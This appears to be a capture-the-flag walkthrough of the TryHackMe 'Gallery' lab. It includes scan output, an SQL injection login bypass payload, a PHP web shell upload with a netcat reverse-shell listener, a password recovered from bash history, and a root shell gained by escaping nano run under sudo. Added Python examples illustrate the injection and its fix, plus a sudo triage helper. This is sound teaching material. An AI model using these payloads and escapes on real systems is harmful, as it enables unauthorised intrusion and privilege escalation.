THM: Gallery

Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.2.97 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-23 22:38 BST
Nmap scan report for 10.10.2.97
Host is up (0.020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 db:44:3b:8e:2e:73:a6:ed:e6:a1:b6:1b:0d:59:b5:4f (RSA)
| 256 46:f1:a7:aa:c1:e5:e2:b0:c5:46:72:95:46:1b:89:a2 (ECDSA)
|_ 256 90:f9:74:d9:ff:e3:a4:e7:1d:3c:c4:31:06:2e:80:0e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Simple Image Gallery System
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds
Website
Checking the site on port 80 we see just the default Apache holding page, so we run a gobuster scan.
# gobuster dir -u http://10.10.2.97 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.2.97
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/.htpasswd (Status: 403) [Size: 275]
/gallery (Status: 301) [Size: 310] [--> http://10.10.2.97/gallery/]
/index.html (Status: 200) [Size: 10918]
/server-status (Status: 403) [Size: 275]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
This reveals the /gallery subdirectory. Visiting the site on port 8080 also redirects us to /gallery/, where we find the login page for “Simple Image Gallery System”.
After trying a couple of standard username/password combinations we find that the login form is vulnerable to SQL injection: entering the payload admin' -- - as the username closes the quoted string and comments out the rest of the WHERE clause, so the password is never checked and we are logged in as admin. We open any of the existing albums and upload a PHP web shell in place of an image.
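To show why admin' -- - logs us in, here is an added example (not code from the page or from the Simple Image Gallery System application) that rebuilds the vulnerable pattern with Python's sqlite3 module: a login query built by string concatenation next to a parameterised one. The table, user and password are constructed for the demo. With the payload as the username the query text becomes `... WHERE username = 'admin' -- -' AND password = '...'`; everything after `--` is a comment, so the password comparison disappears. MySQL requires whitespace after `--`, which is why the payload carries a trailing ` -` so the comment stays well-formed; SQLite accepts `--` without it, and the payload works on both.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the gallery's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Plaintext password only to keep the demo short; a real app stores a salted hash.
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The bug: user input is pasted into the SQL text, so quotes and comments change the query."""
    return ("SELECT id FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Runs the concatenated query; a crafted username bypasses the password check."""
    return conn.execute(build_vulnerable_query(username, password)).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the driver sends the values separately, so the payload is just a string."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?", (username, password)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_demo_db()
    payload = "admin' -- -"
    print(build_vulnerable_query(payload, "anything"))
    print("vulnerable login:", login_vulnerable(conn, payload, "anything"))  # True
    print("safe login:     ", login_safe(conn, payload, "anything"))         # False
```

The parameterised version is the fix: the username `admin' -- -` is compared literally against the column and matches nobody.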
This uploads successfully, so we start a listener, click the “image” we uploaded and get a shell back.
# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.2.97] 54434
Linux ip-10-10-2-97 5.15.0-139-generic #149~20.04.1-Ubuntu SMP Wed Apr 16 08:29:56 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
22:10:40 up 38 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
Looking around on the system we find a backup of mike’s home directory that is world-readable.
$ ls -lah /var/backups/
total 88K
drwxr-xr-x 3 root root 4.0K Jul 10 17:51 .
drwxr-xr-x 13 root root 4.0K May 20 2021 ..
-rw-r--r-- 1 root root 42K Jul 10 17:50 apt.extended_states.0
-rw-r--r-- 1 root root 4.5K Jul 5 14:26 apt.extended_states.1.gz
-rw-r--r-- 1 root root 4.5K Jul 5 14:12 apt.extended_states.2.gz
-rw-r--r-- 1 root root 3.7K Feb 12 2022 apt.extended_states.3.gz
-rw-r--r-- 1 root root 3.7K Aug 25 2021 apt.extended_states.4.gz
-rw-r--r-- 1 root root 3.5K May 21 2021 apt.extended_states.5.gz
-rw-r--r-- 1 root root 3.5K May 20 2021 apt.extended_states.6.gz
drwxr-xr-x 5 root root 4.0K May 24 2021 mike_home_backup
$ ls -lah /var/backups/mike_home_backup
total 36K
drwxr-xr-x 5 root root 4.0K May 24 2021 .
drwxr-xr-x 3 root root 4.0K Jul 10 17:51 ..
-rwxr-xr-x 1 root root 135 May 24 2021 .bash_history
-rwxr-xr-x 1 root root 220 May 24 2021 .bash_logout
-rwxr-xr-x 1 root root 3.7K May 24 2021 .bashrc
drwxr-xr-x 3 root root 4.0K May 24 2021 .gnupg
-rwxr-xr-x 1 root root 807 May 24 2021 .profile
drwxr-xr-x 2 root root 4.0K May 24 2021 documents
drwxr-xr-x 2 root root 4.0K May 24 2021 images
$ cat /var/backups/mike_home_backup/.bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -l*****************
clear
sudo -l
exit
The redacted string after the first sudo -l is a password that mike typed at the shell prompt by mistake. Using it we can log in over SSH as mike and get the user flag.
# ssh mike@10.10.2.97
mike@10.10.2.97's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat 23 Aug 2025 10:34:29 PM UTC
System load: 0.0 Processes: 119
Usage of /: 73.6% of 6.79GB Users logged in: 0
Memory usage: 14% IPv4 address for ens5: 10.10.2.97
Swap usage: 0%
* Ubuntu Pro delivers the most comprehensive open source security and
compliance features.
https://ubuntu.com/aws/pro
Expanded Security Maintenance for Infrastructure is not enabled.
11 updates can be applied immediately.
11 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
36 additional security updates can be applied with ESM Infra.
Learn more about enabling ESM Infra service for Ubuntu 20.04 at
https://ubuntu.com/20-04
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Sat Aug 23 22:34:30 2025 from 10.11.18.78
mike@ip-10-10-2-97:~$ cat user.txt
THM{af**********************ef}
Privilege escalation
Checking mike’s sudo privileges we see a single entry: he can run /opt/rootkit.sh through /bin/bash as root without a password.
mike@ip-10-10-2-97:~$ sudo -l
Matching Defaults entries for mike on ip-10-10-2-97:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mike may run the following commands on ip-10-10-2-97:
(root) NOPASSWD: /bin/bash /opt/rootkit.sh
Looking at the script, it is owned by root and not writable by us, so we cannot simply modify it.
mike@ip-10-10-2-97:~$ ls -lah /opt/rootkit.sh
-rw-r--r-- 1 root root 364 May 20 2021 /opt/rootkit.sh
mike@ip-10-10-2-97:~$ cat /opt/rootkit.sh
#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
# Execute your choice
case $ans in
versioncheck)
/usr/bin/rkhunter --versioncheck ;;
update)
/usr/bin/rkhunter --update;;
list)
/usr/bin/rkhunter --list;;
read)
/bin/nano /root/report.txt;;
*)
exit;;
esac
However, choosing the read option launches nano on /root/report.txt, and because the script runs under sudo, nano runs as root.
mike@ip-10-10-2-97:~$ sudo bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read
GTFOBins documents that nano can run commands from inside the editor: Ctrl-R then Ctrl-X opens the Execute Command prompt (the “[ Executing... ]” line below), and entering reset; sh 1>&0 2>&0 there gives us a root shell, from which we read the root flag.
[ Executing... ]#
# Get Help M-F New Buffer ^X Read File
# Cancel M-\ Pipe Text
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{ba********************************87}
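The privilege escalation above follows a pattern worth automating: a NOPASSWD rule runs a root-owned script, and that script hands control to an interactive program that GTFOBins lists as able to execute commands. As an added example (not code from the page), here is a small triage helper of the kind you would run after sudo -l: it parses the rule output, works out which file actually executes, and scans that script for shell-spawning programs. The sudo output and script text are embedded as constructed copies of what the page shows; on a real host you would read each script from disk. It is a heuristic: it tokenises the script and matches program basenames, so a spawner reached indirectly (through a variable, an alias or a second script) is missed.

```python
import os
import re
import shlex

# Constructed sample: the `sudo -l` output for mike as shown in the writeup.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for mike on ip-10-10-2-97:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on ip-10-10-2-97:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
"""

# Constructed copy of /opt/rootkit.sh as printed in the writeup.
ROOTKIT_SH = r"""#!/bin/bash
read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;
# Execute your choice
case $ans in
  versioncheck)
    /usr/bin/rkhunter --versioncheck ;;
  update)
    /usr/bin/rkhunter --update;;
  list)
    /usr/bin/rkhunter --list;;
  read)
    /bin/nano /root/report.txt;;
  *)
    exit;;
esac
"""

# Interactive programs GTFOBins documents as able to run commands from inside the program.
SHELL_SPAWNERS = {"nano", "pico", "vi", "vim", "less", "more", "man", "emacs", "ed"}

# Interpreters whose first non-option argument is the script that really runs.
INTERPRETERS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl"}

# One rule line as `sudo -l` prints it: "(runas) TAG: TAG: command[, command...]".
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z_]+:\s*)*)(\S.*)$")


def parse_sudo_rules(sudo_l_output: str) -> list[dict]:
    """Return the command rules from `sudo -l` output as dicts: runas, nopasswd, command."""
    rules, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, commands = m.groups()
        for cmd in commands.split(","):
            rules.append({
                "runas": runas.split(":")[0].strip(),  # "(root : root)" -> "root"
                "nopasswd": "NOPASSWD:" in tags,
                "command": cmd.strip(),
            })
    return rules


def script_path_from_command(command: str) -> str:
    """The file sudo really executes: the script when an interpreter is named, else the binary."""
    argv = shlex.split(command)
    if argv and os.path.basename(argv[0]) in INTERPRETERS:
        for arg in argv[1:]:
            if not arg.startswith("-"):
                return arg
    return argv[0] if argv else ""


def find_shell_spawners(script_text: str) -> set[str]:
    """Basenames of shell-spawning interactive programs invoked anywhere in a shell script."""
    found = set()
    for line in script_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        try:
            tokens = shlex.split(stripped)
        except ValueError:  # quote spanning lines; skip rather than guess
            continue
        found.update(os.path.basename(t) for t in tokens if os.path.basename(t) in SHELL_SPAWNERS)
    return found


def triage(sudo_l_output: str, script_files: dict[str, str]) -> list[tuple[str, str]]:
    """Pair each root-level rule with any shell-spawning program it reaches (directly or via a script)."""
    findings = []
    for rule in parse_sudo_rules(sudo_l_output):
        if rule["runas"] not in ("root", "ALL"):
            continue
        target = script_path_from_command(rule["command"])
        if os.path.basename(target) in SHELL_SPAWNERS:  # the editor itself is the sudo target
            findings.append((rule["command"], os.path.basename(target)))
            continue
        for prog in sorted(find_shell_spawners(script_files.get(target, ""))):
            findings.append((rule["command"], prog))
    return findings


if __name__ == "__main__":
    for command, prog in triage(SUDO_L_OUTPUT, {"/opt/rootkit.sh": ROOTKIT_SH}):
        print(f"sudo rule '{command}' reaches {prog} as root; check the GTFOBins entry for {prog}")
```

The fix on the defending side is the same whichever program the helper flags: a script run through sudo should never drop into an interactive editor or pager as root; display the report with a non-interactive command, or give the user sudoedit on that one file instead.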